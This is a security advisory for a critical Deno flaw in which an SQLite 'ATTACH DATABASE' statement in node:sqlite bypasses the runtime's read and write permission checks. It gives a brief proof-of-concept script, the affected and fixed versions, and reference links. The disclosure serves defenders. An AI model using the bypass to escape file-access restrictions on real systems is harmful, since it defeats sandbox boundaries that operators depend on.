CRITICAL9.1
GHSA-8vxj-4cph-c596
Deno has --allow-read / --allow-write permission bypass in `node:sqlite`
Details
## Summary
It is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement.
## PoC
```js // poc.js import { DatabaseSync } from "node:sqlite"
const db = new DatabaseSync(":memory:"); db.exec("ATTACH DATABASE 'test.db' as test;");
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);"); ```
``` $ deno poc.js ```
Are you affected?
Enter the version of the package you're using.
Affected packages
crates.io/deno
Introduced in:
2.2.0Fixed in: 2.2.5Upgrade deno to 2.2.5 or newer (ecosystem crates.io).
crates.io/deno_node
Introduced in:
0.129.0Fixed in: 0.134.0Upgrade deno_node to 0.134.0 or newer (ecosystem crates.io).
References
- https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596[WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2025-48935[ADVISORY]
- https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860[WEB]
- https://github.com/denoland/deno[PACKAGE]
- https://rustsec.org/advisories/RUSTSEC-2025-0138.html[WEB]